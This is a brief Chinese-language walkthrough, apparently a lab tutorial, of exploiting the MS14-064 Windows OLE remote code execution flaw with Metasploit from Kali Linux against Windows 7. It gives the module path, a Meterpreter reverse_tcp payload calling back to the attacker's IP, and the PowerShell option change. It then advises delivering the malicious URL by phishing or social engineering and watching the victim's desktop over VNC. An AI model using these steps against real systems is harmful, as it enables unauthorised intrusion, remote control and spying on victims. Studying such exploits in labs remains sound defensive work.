MS14-064OLE遠程代碼執行漏洞
攻擊機:Kali Linux 2019
靶機:Windows 7 x64、x32
攻擊步驟:
1.打開攻擊機Kali Linux 2019系統和靶機Windows 7系統
2.確定IP地址后,Kali Linux開啟msf模塊,准備攻擊測試
3.在這里我們使用MS14-064OLE遠程代碼執行漏洞,開始搜索MS14-064
(search MS14-064)
4.我們利用use exploit/windows/browser/ms14_064_ole_code_execution 加載漏洞利用模塊
(use exploit/windows/browser/ms14_064_ole_code_execution)
5.查看詳細配置,進行下一步的詳細配置
6.開始配置payload,Payload下的LHOST地址和模塊下的SRVHOST地址
(Payload:set payload windows/meterpreter/reverse_tcp)
(LHOST地址:Kali Linux IP地址)
(SRVHOST地址:Kali Linux IP地址)
7.注意一下上圖這個箭頭位置,要把其中的默認false熟悉改為true,因為msf中自帶的漏洞是利用exp調用的是powershell,所以msf的exp代碼只對安裝了powershell的系統生效,這里我們來用windows 7 系統進行測試。
(命令:set ALlowPowershellPrompt true)
8.輸入exploit 進行測試,會生成一個url鏈接,用釣魚方法或者是社會工程學傳到Win7主機里,就可以實現控制
9.提取到權限,滲透完成,可以進行遠程桌面操控,觀察操作桌面等
(run vnc 觀察操作界面)